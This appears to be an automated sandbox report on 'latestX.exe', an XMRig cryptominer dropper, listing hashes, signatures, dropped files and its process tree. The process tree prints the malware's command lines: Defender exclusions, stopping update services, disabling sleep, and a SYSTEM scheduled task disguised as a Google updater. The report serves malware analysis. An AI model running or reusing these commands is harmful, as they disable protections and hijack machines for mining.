Analysis

  • max time kernel
    299s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20230915-en
  • resource tags

    arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
  • submitted
    10/10/2023, 05:04

General

  • Target

    latestX.exe

  • Size

    5.6MB

  • MD5

    bae29e49e8190bfbbf0d77ffab8de59d

  • SHA1

    4a6352bb47c7e1666a60c76f9b17ca4707872bd9

  • SHA256

    f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

  • SHA512

    9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

  • SSDEEP

    49152:MMcDmMRlBdzs3EThgR0uEqBXLdcJAbtNmbOHaGhEospqOziZXAfrrARS7JL2ozPX:dcdrCET8XeospuZXAf0EJyocDKIVDT05

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 23 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3280
      • C:\Users\Admin\AppData\Local\Temp\latestX.exe
        "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:408
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4060
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3944
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:1224
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:4412
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:5040
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:4500
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:4504
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3556
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2720
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3004
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2960
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2448
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:5068
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:2804
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:8
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:3868
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:4320
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:3316
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:3860
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:2988
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5032
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:2992
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:4056
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:404
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:4804
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4336
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:4368
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4024
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:2064

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  5.6MB

                  MD5

                  bae29e49e8190bfbbf0d77ffab8de59d

                  SHA1

                  4a6352bb47c7e1666a60c76f9b17ca4707872bd9

                  SHA256

                  f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

                  SHA512

                  9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  3KB

                  MD5

                  ad5cd538ca58cb28ede39c108acb5785

                  SHA1

                  1ae910026f3dbe90ed025e9e96ead2b5399be877

                  SHA256

                  c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                  SHA512

                  c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  8d90b0d9e153d0970856fb6cee3f5766

                  SHA1

                  d31a83aa9c0a563be2fe641869f65e3c6813dbad

                  SHA256

                  cc54aa1d8729111f25fb1466e1643b986444c67af610d6de90ae41b0455af364

                  SHA512

                  a4356dd832b7c4d355fbb25caf206dee20dda91b131f06008e68829e2902be76370000cce1ee5374d5be3e906e1249ce3d3b02f826b21465eb4567784589eb83

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tdgrr0u1.wck.ps1

                  Filesize

                  1B

                  MD5

                  c4ca4238a0b923820dcc509a6f75849b

                  SHA1

                  356a192b7913b04c54574d18c28d46e6395428ab

                  SHA256

                  6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                  SHA512

                  4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                • C:\Windows\System32\drivers\etc\hosts

                  Filesize

                  3KB

                  MD5

                  00930b40cba79465b7a38ed0449d1449

                  SHA1

                  4b25a89ee28b20ba162f23772ddaf017669092a5

                  SHA256

                  eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                  SHA512

                  cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  3KB

                  MD5

                  811d351aabd7b708fef7683cf5e29e15

                  SHA1

                  06fd89e5a575f45d411cf4b3a2d277e642e73dbb

                  SHA256

                  0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

                  SHA512

                  702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  302a7c179ef577c237c5418fb770fd27

                  SHA1

                  343ef00d1357a8d2ff6e1143541a8a29435ed30c

                  SHA256

                  9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

                  SHA512

                  f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

                • memory/408-102-0x00007FF622730000-0x00007FF622CD1000-memory.dmp

                  Filesize

                  5.6MB

                • memory/408-0-0x00007FF622730000-0x00007FF622CD1000-memory.dmp

                  Filesize

                  5.6MB

                • memory/1716-97-0x00000212C25A0000-0x00000212C25B0000-memory.dmp

                  Filesize

                  64KB

                • memory/1716-100-0x00007FFCF00C0000-0x00007FFCF0AAC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1716-59-0x00007FFCF00C0000-0x00007FFCF0AAC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1716-60-0x00000212C25A0000-0x00000212C25B0000-memory.dmp

                  Filesize

                  64KB

                • memory/1716-62-0x00000212C25A0000-0x00000212C25B0000-memory.dmp

                  Filesize

                  64KB

                • memory/1716-78-0x00000212C25A0000-0x00000212C25B0000-memory.dmp

                  Filesize

                  64KB

                • memory/2064-549-0x00007FF7A1460000-0x00007FF7A1A01000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2064-104-0x00007FF7A1460000-0x00007FF7A1A01000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2804-230-0x0000026BB95B0000-0x0000026BB95C0000-memory.dmp

                  Filesize

                  64KB

                • memory/2804-263-0x00007FFCF00C0000-0x00007FFCF0AAC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2804-172-0x0000026BD1B10000-0x0000026BD1B1A000-memory.dmp

                  Filesize

                  40KB

                • memory/2804-229-0x0000026BB95B0000-0x0000026BB95C0000-memory.dmp

                  Filesize

                  64KB

                • memory/2804-110-0x00007FFCF00C0000-0x00007FFCF0AAC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/2804-112-0x0000026BB95B0000-0x0000026BB95C0000-memory.dmp

                  Filesize

                  64KB

                • memory/2804-113-0x0000026BB95B0000-0x0000026BB95C0000-memory.dmp

                  Filesize

                  64KB

                • memory/2804-132-0x00007FF6F8650000-0x00007FF6F8660000-memory.dmp

                  Filesize

                  64KB

                • memory/2804-133-0x0000026BB9590000-0x0000026BB95AC000-memory.dmp

                  Filesize

                  112KB

                • memory/2804-139-0x0000026BD2040000-0x0000026BD20F9000-memory.dmp

                  Filesize

                  740KB

                • memory/4024-565-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-577-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-599-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-597-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-595-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-593-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-591-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-589-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-587-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-585-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-583-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-581-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-579-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-575-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-573-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-571-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-569-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-550-0x0000000000FE0000-0x0000000001000000-memory.dmp

                  Filesize

                  128KB

                • memory/4024-567-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-553-0x00000000012F0000-0x0000000001330000-memory.dmp

                  Filesize

                  256KB

                • memory/4024-563-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-555-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-557-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-558-0x0000000012B80000-0x0000000012BA0000-memory.dmp

                  Filesize

                  128KB

                • memory/4024-560-0x00007FF6E95A0000-0x00007FF6E9D8F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4024-561-0x0000000012B80000-0x0000000012BA0000-memory.dmp

                  Filesize

                  128KB

                • memory/4060-53-0x00007FFCF00C0000-0x00007FFCF0AAC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4060-49-0x0000025987480000-0x0000025987490000-memory.dmp

                  Filesize

                  64KB

                • memory/4060-7-0x0000025987500000-0x0000025987522000-memory.dmp

                  Filesize

                  136KB

                • memory/4060-9-0x00007FFCF00C0000-0x00007FFCF0AAC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4060-26-0x0000025987480000-0x0000025987490000-memory.dmp

                  Filesize

                  64KB

                • memory/4060-11-0x0000025987480000-0x0000025987490000-memory.dmp

                  Filesize

                  64KB

                • memory/4060-13-0x0000025987480000-0x0000025987490000-memory.dmp

                  Filesize

                  64KB

                • memory/4060-12-0x000002599FB60000-0x000002599FBD6000-memory.dmp

                  Filesize

                  472KB

                • memory/4336-387-0x0000028AACD30000-0x0000028AACD40000-memory.dmp

                  Filesize

                  64KB

                • memory/4336-388-0x0000028AACD30000-0x0000028AACD40000-memory.dmp

                  Filesize

                  64KB

                • memory/4336-293-0x00007FF6F7F60000-0x00007FF6F7F70000-memory.dmp

                  Filesize

                  64KB

                • memory/4336-511-0x0000028AAD4C0000-0x0000028AAD4DC000-memory.dmp

                  Filesize

                  112KB

                • memory/4336-271-0x0000028AACD30000-0x0000028AACD40000-memory.dmp

                  Filesize

                  64KB

                • memory/4336-273-0x0000028AACD30000-0x0000028AACD40000-memory.dmp

                  Filesize

                  64KB

                • memory/4336-270-0x00007FFCF00C0000-0x00007FFCF0AAC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4336-535-0x00007FFCF00C0000-0x00007FFCF0AAC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4336-536-0x0000028AACD30000-0x0000028AACD40000-memory.dmp

                  Filesize

                  64KB

                • memory/4336-545-0x00007FFCF00C0000-0x00007FFCF0AAC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4368-554-0x00007FF6D2F70000-0x00007FF6D2F9A000-memory.dmp

                  Filesize

                  168KB

                • memory/4368-564-0x00007FF6D2F70000-0x00007FF6D2F9A000-memory.dmp

                  Filesize

                  168KB